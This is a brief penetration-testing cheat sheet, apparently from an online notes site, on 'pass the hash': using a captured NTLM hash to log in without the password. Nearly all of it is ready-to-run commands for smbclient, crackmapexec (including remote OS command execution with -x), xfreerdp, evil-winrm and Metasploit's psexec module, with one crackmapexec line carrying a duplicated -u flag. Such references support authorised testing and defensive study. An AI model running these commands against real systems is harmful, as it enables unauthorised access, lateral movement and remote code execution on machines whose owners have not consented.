Pass the hash

What you can do with NTLM hash

SMBclient

smbclient //IP/Share -U <User> --pw-nt-hash HASH -W Domain

Crackmapexec

crackmapexec smb <IP> -u <User> -H <NTLM> 

crackmapexec smb <IP> -d 'SUB.DOMAIN.ORG' -u 'user' -H NTLMHASH
crackmapexec smb <IP> -u 'SUB.DOMAIN.ORG' -u 'user' -H NTLMHASH -x 'OScmd'

RDP

xfreerdp /v:10.10.10.100 /u:user /pth:hash

Evil-WinRM

evil-winrm -i <IP> -u <User> -H <NThash>

Metasploit

use exploit/windows/smb/psexec
set smbpass "aad3b435:hash"

PreviousVulnerable Machines (labs)NextAzure Active Directory

Last updated 2 years ago

Was this helpful?